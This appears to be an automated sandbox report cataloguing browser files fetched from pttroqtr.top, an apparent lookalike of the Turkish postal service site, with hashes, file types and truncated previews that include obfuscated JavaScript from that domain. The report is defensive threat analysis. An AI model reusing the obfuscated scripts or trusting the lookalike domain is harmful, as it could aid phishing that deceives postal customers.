                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:<svg height="511pt" viewBox="-90 1 511 511.99899" style="fill:#b7b7b7;" width="511pt" xmlns="http://www.w3.org/2000/svg"><path d="m332.464844 275.082031c0-8.429687-6.835938-15.265625-15.269532-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 74.6875-60.757812 135.445313-135.445312 135.445313-74.683594 0-135.441407-60.757813-135.441407-135.445313 0-8.429687-6.835937-15.265625-15.269531-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 86.378907 66.320312 157.539063 150.710938 165.273438v41.105469h-56.664063c-8.433594 0-15.269531 6.835937-15.269531 15.269531 0 8.433593 6.835937 15.269531 15.269531 15.269531h143.871094c8.429687 0 15.265625-6.835938 15.265625-15.269531 0-8.433594-6.835938-15.269531-15.265625-15.269531h-56.667969v-41.105469c84.394531-7.730469 150.714844-78.894531 150.714844-165.273438zm0 0"/><path d="m166.480469 372.851562c53.910156 0 97.769531-43.859374 97.769531-97.769531v-177.316406c0-53.90625-43.859375-97.765625-97.769531-97.765625-53.90625 0-97
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23451
                                                                                                                                                                                            Entropy (8bit):7.830242871837404
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:ult4ezgA7TRsHmD6+Hv/o92O7/h+y04TS8do9O4NZ0VQFdxYYRfW4By:uQeEA7TaGW+HoYM/h+TS9SJAQXFWQy
                                                                                                                                                                                            MD5:2C9ACA8B197F0D642CCFF28D6B23289D
                                                                                                                                                                                            SHA1:57CDD6D8F177242E12364C419CCA4BFCF6D72922
                                                                                                                                                                                            SHA-256:6C8B32F54CD73CD08B9B79D0F2491E5195983FABD0421BBEB99A8EA3CB86256F
                                                                                                                                                                                            SHA-512:6BB8DADF816B2BFB10F59A55803346CD17A9BCCA628BEF4840B9359EBA0D3204B7D07CBCEBFF3BE2093847CE35D490696DBA2EAA965675BD8E7B7CFDAA271C3C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..[(IDATx....c.}.y.......1..K.y.L..j.,1v\j......_c.d.....^p........^...$i5.$...RA..tw5..3..S9....U.@0<.. .=,.U0.%.Kw...{ZGG.JW.UI..|@]]*I..s.t>..s..(.c......E...... q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (17553), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17555
                                                                                                                                                                                            Entropy (8bit):5.212307168759353
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:BfZT1WkfJ4FOFDULEKALK2bq1pnv313SY7GhePO1yd816+hePXZ0dLXvLMOW4RxE:BGkf8eDeTEK2anv30uSZ6jeNMJl5ll
                                                                                                                                                                                            MD5:932AB86A485C5448691469792A137121
                                                                                                                                                                                            SHA1:3BA7F519F870F7664779F3765959D07971F6165D
                                                                                                                                                                                            SHA-256:8FB9EEF58678EAE781227CFAD2EAD48E90FDD5917AC83BC097225BA243B63F3B
                                                                                                                                                                                            SHA-512:D5B0B3B9566BBE7F51B1629C145E62DE854F440C19E9D47FC076D6F7A96BE8AC032F2BA935FCC6CB5C2FE2E08EE11750DBD2918C6E19939EEC4707DFAFFF2A42
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat widget already exists"):(e=document.createElement("div"),a=document.createElement("div"),AloChat.fullsize?(e.style.margin="0px",e.style.zIndex="9999999",e.style.backgroundColor="white",t.custom_properties&&t.custom_properties.master_page&&(".alotech-chat-widget"in(masterPageCss=t.custom_properties.master_page)&&masterPageCss[".alotech-chat-widget"].fullsize_status&&masterPageCss[".alotech-chat-widget"].fullsize_status.height&&(e.style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCss[".alotech-chat-body"].fullsize_status.height)):(e.styl
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (6251)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6299
                                                                                                                                                                                            Entropy (8bit):5.275804119350307
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:wlBVCnW9nYKvjmGsxWmRxybPlH+xPVVBqmhq50xBmfxPDjRLQ2jc6:wdCnWSKv3MjGcxfB+UIBZl
                                                                                                                                                                                            MD5:22F20AFA6247DF798587ABA70C5F7BFB
                                                                                                                                                                                            SHA1:CA40F0F78FFF921142925C410027675DE1F0D967
                                                                                                                                                                                            SHA-256:762A67F772461C6E06220D94D1D196D858D74F6C1A9F27C4186361CFA0BC951F
                                                                                                                                                                                            SHA-512:E5FA88D00AD4736E931BB6CC6286F750EB263A5888F322DC52FB3A7200B90162991F15F1CD75DDB2B542113BA84FF0E0FF85D220724750FA3CE7100B5374E921
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.style_menuPanel__EhQlL{padding-left:1rem;background-color:#f8f8f8}.style_menu__geUjE{border-left:#00a6cc;background-color:#f8f8f8;position:sticky;overflow:scroll;top:0;max-height:100vh;padding:1.5rem .5rem 2rem 2rem}.style_menu__geUjE::-webkit-scrollbar{width:1rem;scroll-padding-top:20px}.style_menu__geUjE::-webkit-scrollbar-thumb{background:#e3e3e3;border-radius:100px;border:.25rem solid transparent;background-clip:content-box}.style_menu__geUjE>li{position:relative;width:95%;margin:.3rem 0 .3rem .3rem;cursor:pointer;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li:after{content:"";position:absolute;left:-25px;top:0;width:20px;height:20px}.style_menu__geUjE>li i{position:absolute;top:.4rem;left:-1.4rem}.style_menu__geUjE>li>li i{position:absolute;top:.7rem;left:-1.8rem}.style_menu__geUjE>li>a>b{position:absolute;left:95%}.style_menu__geUjE>li>a{display:flex;align-items:center;padding:0 0 .5rem;width:100%;color:var(--pttLinkColor);font-size:1rem}.style_menu__geUjE>li>a:h
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):33304
                                                                                                                                                                                            Entropy (8bit):7.961845706148848
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:QaNY3WBAdXYZ8AcxJHaF3LLnuboDyLoAy2jRROV:QaNYGIXHNJH+3fnuc+oUr2
                                                                                                                                                                                            MD5:1E5D3CDE4B44D1B35A2CC5EA301E1CBE
                                                                                                                                                                                            SHA1:49491E19C66AB8D4937218756CAF7E032FEE57D1
                                                                                                                                                                                            SHA-256:91D51089265627863046D01E337C732315D18F75B9D1788C909DF6A79E117281
                                                                                                                                                                                            SHA-512:1CDECBF63B8E01B80CB7DAB82D3FAAE2C40ABFA3A91FCD80684540048F07D5D5DDC25ED3907A821A0ADCE2F93A5A1612C9E082AC8F75D938BD3A01CF18ED5DF7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/45.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...x.......n..!$.BB....,.\. ..UZk..=...b.Bmk..k...rj[..}.......Z-U..#...(...!.B....g.....,...;3.......<.........;.k.... ..B.!.E*w.!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B.!.q..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...#..B...#..B.!.q..B.!."..B.!.P..B.!.P..B.!...8B.!..B.G.!..B.G.!..B(..!..B.E.!..B.E.!..B...#..B.!.q..B.!."..B.!."..B.!.P..B.!...8B.!...8B.!..B.G.!..B(..!..B(..!..B.E.!..B...t..BH2.\:.\.......'..r..B........BH<..*..Ji).,....x.._.WZ...{<....B.}.<"...8B..(.........G..G.=.2D.%y.~.U..v[..-.QW.Y .h.#.P..B..`..J+...._...q.ckGN.].D.."...1.......VsVZ..q.,..v...8BH"..J.hS...m...j....S~,.%.z.._....o......
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):749
                                                                                                                                                                                            Entropy (8bit):5.044929142480738
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:fpcfHOdEK+lXcyPDExMiv2rUX60XlmxNWmK+lXk2yKq+srXmiv2vs2AjRvrcOKGz:BcfeEtl1gCiv2rUK01mnWmtl0iFsrXmO
                                                                                                                                                                                            MD5:60806A64BBF5D5012498FDF58B1C7728
                                                                                                                                                                                            SHA1:CF7E20767D84FBFB2BB93ED15FA1FE8C9CFE7F66
                                                                                                                                                                                            SHA-256:B836AA0FB7B9DF77B5C3CE355379FBEFC6E7DB2DB4FBA49646E3ECDA73885909
                                                                                                                                                                                            SHA-512:E20B28C39C0B698B848BD467C140BEBB435A62AFEEE715EAAA795087F3CF2DC2F016B3F8804468774F5F26AB2282B08CE12D2C412AFEAB0B610D31298BF34FB0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttem.alo-tech.com/chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t
                                                                                                                                                                                            Preview:#legal_text {..height: 360px;..overflow: auto;.}..speech {..background:#fafeff;.}..speech:before {..border-right: 7px solid #fafeff;.}..speech {..color:#00a7cf;.}..speech .media-heading {..color:#00a7cf;.}..btnCustom {..color:#00a7cf;..border-color:#00a7cf;.}..btnCustom:hover {..color:#00a7cf;..border-color:#00a7cf;..background:transparent;..opacity:0.8;.}..speech-right > .speech {..background:#77C3E3;.}..speech-right > .speech:before {..border-left: 7px solid #77C3E3;.}..speech-right .speech {..color:#ffffff;.}..speech-right > .speech .media-heading {..color:#ffffff;.}.#btnSendMessage {..background-color:#00a7cf;.}.#alo-chat-logout {..background-color:#ea2f1a;.}.#roombody, h3, .chatbody {..font-family:'Open Sans' !important ;.}.// Cached
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):42406
                                                                                                                                                                                            Entropy (8bit):7.97968488859527
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:1oorXSxmPWLkL/IYHs6jipHKCwcT/ZtGJ2AlAGhF22x35kt+YDQpA2ooObEgH4S:1owXS/LkUSLj2Zwc+J2CpLxJruEgH/
                                                                                                                                                                                            MD5:0B94ED4D25A30530E566195F0F3ADE8B
                                                                                                                                                                                            SHA1:BF9184B5FCE613FF573CB63DAB6D52520663D8A2
                                                                                                                                                                                            SHA-256:C35D251C45608F6A64A6EF58590A36C580AD0BC1B0AC53697F2B9398FD64D626
                                                                                                                                                                                            SHA-512:33E3CC1D4D25628253C632313981E568C75CB65E70B391DF0E86463CF0DC9A6490D18384CDEDF61304D2623A1CC485A5621B814DAD83A7A7EE0590D14BD98EF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X..............ALPH.}....'$H..xkD..9..aR...?..1..>R7@.'...XH5.(c.?..g)...>...8(....[..[..Q..K;....e.hf...ZIja....n.fVfj..w .\..D....y>.y.s.........o.=W.m.:i"". *..b....K.x.[.Ql..c.`.wcM4...F..k..&........s.qN%......#..........N....7...Z.7..m1.Q#.,C.Y.?.+.R.pPN@A....q..j.....U.`.a.-*.8..G%<2....N.5........j.Q5....~..G........7..>..w..a.|../..WwC...).lU6X........5?.2.Zh...u5....4....1.:h.-o.W.....p..P.....;..c...@..[T...y.{..o.6....\..g...\.....}.5_M....(...a....Y....n.......C..pJ...........3.\.G..j..'..x.T.h.1@........(.9...a.j....Q...X....|>....@.......0W_.AZ..$..X/....1.....N....{....\@y....].Ey..f.'.........o5.p.%.....*...i..@9-.\bn..RU.....Q..f56...y._.vC..7..Z......6.'.....f..G.TW....%t.p..3.~0.....%<v...}..t'.0.I..x...h....1..*.LV}`..}. ..:.'........0PQG..j:@W-.se.B..4..U3..U.......S...I...j..#.........4.B.)....u1\S~.=.....|vT2...Yz..#6!.PK..\O+.LS...........1Q..%...Ry`....j..rZ...N.T.>..WQ>......h.....@...x..jk&PZ.r..4....2...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11236
                                                                                                                                                                                            Entropy (8bit):7.782737264318003
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ZK9RLFVUR7LSdHxVoigH9+RwfTKOJsP/E+UpeiT3oCYvwAPYG9V+RMBM8T:WRLPUUjVoigawfWOGxwJ4CYv3PiCGu
                                                                                                                                                                                            MD5:FF5BD3D7849B187DEC777004626B58FF
                                                                                                                                                                                            SHA1:4F7FDA5D6D9E8D07E6F8485872FD962007DCF139
                                                                                                                                                                                            SHA-256:CE97846C74192E04D8DF79782636ADDEC31439985A7278317635E7777F365667
                                                                                                                                                                                            SHA-512:28555EB25B6F46D8623E1338DAD84E431BA354A1B5A1750E6D3FE86FDDCF78D28C3CDD026BF6F30A8DE4585657453E070F6068A8A6654A0CE5EE34BADF3E12A9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/33.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx...MV........g.&#.to.y.&.4-..d.QF`<...........F...5#....e.HU{..J<.ZZ.9.Q....?}.....`\.8...B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B...B........7T....Z....../.r.Z9.?gu....?.'..x.......L...<..X.|.m...}.}>.?.k~.,..z..:.8.{}n.._...s......%..i].\..}.i.V..k.Y..].....~>[...._....L........xU...O..|W....p{.!.|@..y.@.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):10988
                                                                                                                                                                                            Entropy (8bit):7.850899696696491
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:LXQaP9egGbfXDRL6/6nIgj8Dvyn8b7ReJcWS1Mzvon0VEf6GdpE8kXa49:LXZPOz86Tn8b9vWky80G7kR
                                                                                                                                                                                            MD5:5779E1BC67CC9B240AAF6C72C3AD52B2
                                                                                                                                                                                            SHA1:61D74E5A57DB83F1E3B060CEF902BF35BE925F78
                                                                                                                                                                                            SHA-256:5ED2739E173ED5FB568A567AC79927A7EA6541E93DB63435966CEDE02783757F
                                                                                                                                                                                            SHA-512:E76E29933B4E766A4993F58DD5E13230E5F93235E1D3E506F36D73D4EAD0298D7EA5B963942B2F19FF9D6638F637F824CED0FE615CAB3FFBB05D1ADD07146B9F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/49.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..*yIDATx...OR.../`..;';.3.1... .q..g..W.YA..b.*.CV.YA.q.......m>N.iK.l...r%..,}.....~....../.G....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q}...q..)..@..Oy..*..@..I..N... ...A...r...'....q..r..JQ..B\..gO5r... ..r..B...b.....9....D1..B\...r...'....q..r#....q..I....8A.....p..<.. ...uV..!..b..b......5t....B\...W.[..!....U.9.@.....!.A........!N....8.9.@.C.......rG....8...n. .JQ...G..gO5r....q.r.... ...q.r...'...B...r....B...&...8...8...8..!...!...!...!n......8..$.r.......B........q. .Q!.;........b.M.....p. .Q.m...........I.K..I....GO.\.>.....8z.......(j....I.K.n.?..3..q. ..p. .. .....p. .. w.@...c........%.1.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (16738)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16786
                                                                                                                                                                                            Entropy (8bit):5.215177146054649
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:rilmZioo339G50Fz+TFRTNGlIUZHW8+IBMSVWT6TIMr8XELtiKIGokAnKmK2/uiR:rigZip3M+cpN812cbrrfLYttyOuiR
                                                                                                                                                                                            MD5:A1387532464E933F53082E2AAC823BCF
                                                                                                                                                                                            SHA1:5906C6934848C0BECAA214824C8B1B4DA504E678
                                                                                                                                                                                            SHA-256:3F0D5462B87C6523CC8435DB1964225DEB7D7FEF4C9D228E290F9C3350947392
                                                                                                                                                                                            SHA-512:52784644D8FCEEE9748D22819D0F3FCE35B414342CDA43C4127F0DAB087BABD5DED63E63FD07AAF0EAE37BE9A4CBF23AC5A6EA48E43C71E14AB29767ED3A3577
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.styles_container__SM2uK{display:flex;display:-ms-flexbox;justify-content:center;align-items:center;flex-direction:column}.styles_container__SM2uK>.styles_title__wSg3c{position:relative;display:inline-block;margin-bottom:4rem;color:var(--pttLinkColor);font-size:1.5rem;font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_title__wSg3c:before{position:absolute;top:50%;transform:translateY(-50%);left:-1rem;background-color:var(--pttGreenColor);content:"";width:.4rem;height:2rem}.styles_container__SM2uK>.styles_description__ZeTyg{margin-bottom:6rem;color:var(--pttLinkColor);font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_iconContainer__doMvh{position:relative;padding:1rem}.styles_container__SM2uK>.styles_iconContainer__doMvh>.styles_face__Yx2m0{position:relative;padding:2rem;border-radius:50%;color:var(--pttYellowColor);font-size:8rem;z-index:1}.styles_container__SM2uK>.styles_iconContainer__doMvh>i:not(.styles_face__Yx2m0){color:#eee;font-size:2.5rem}.styles_contai
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):66461
                                                                                                                                                                                            Entropy (8bit):5.199378053156873
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:NJMB6MVRvBaKyRABaKyRFF5JDWOenyS87BntgL:6VRQR5RFNydP8tntgL
                                                                                                                                                                                            MD5:B93DA97CD55A2E4195627852FCD89CE3
                                                                                                                                                                                            SHA1:F2C3ED7DB88A85B2B26414C0ECA3F3188359B10E
                                                                                                                                                                                            SHA-256:CB4182042A3075CE08853BF3E5ECD4F3295C9FAD99C94E0D1A9C9CD139BE1FA6
                                                                                                                                                                                            SHA-512:37A6AA311E34AADE2AB55ED987DB3A1207984D8A232ED04F7EE730020332211DB315CBAC7E19E472D5D664FD64B1A3AEF5127F6ED82548E51EBDD75C0CED299C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/81d8b40497d071a4.css
                                                                                                                                                                                            Preview:.styles_shipmentTrackingPreviewModal__W8Vv6{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(8px);-moz-backdrop-filter:blur(8px);-o-backdrop-filter:blur(8px);backdrop-filter:blur(8px);z-index:55;overflow-y:auto;transition:visibility .2s,opacity .2s ease-in-out}.styles_shipmentTrackingPreviewModal__W8Vv6>.styles_close__YK3MI{position:fixed;top:2rem;right:3rem;color:#fff;font-size:2rem;font-style:normal;cursor:pointer}.styles_shipmentTrackingPreviewModalOpen__fUMRq{visibility:visible!important;opacity:1!important}.styles_shipmentTracking__TSn_z{position:relative;display:flex;display:-ms-flexbox;flex-direction:row;flex-wrap:wrap;justify-content:space-evenly;align-items:center;width:100%;margin-top:5rem;margin-bottom:5rem;z-index:55}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze{display:flex;display:-ms-flexbox;flex-direction:column;justify-content:center;position:relative;z-index:5}.styles_shipmentTracking__TSn_z>.styles_stat
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (35443), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):35443
                                                                                                                                                                                            Entropy (8bit):5.338743939035259
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
                                                                                                                                                                                            MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
                                                                                                                                                                                            SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
                                                                                                                                                                                            SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
                                                                                                                                                                                            SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/c16a2af0JxKnW.js
                                                                                                                                                                                            Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1965), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1965
                                                                                                                                                                                            Entropy (8bit):5.287237545046552
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
                                                                                                                                                                                            MD5:D66FEBB5B4397732135B71831C138AFD
                                                                                                                                                                                            SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
                                                                                                                                                                                            SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
                                                                                                                                                                                            SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (56758)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):56808
                                                                                                                                                                                            Entropy (8bit):5.646177181712691
                                                                                                                                                                                            Encrypted:false
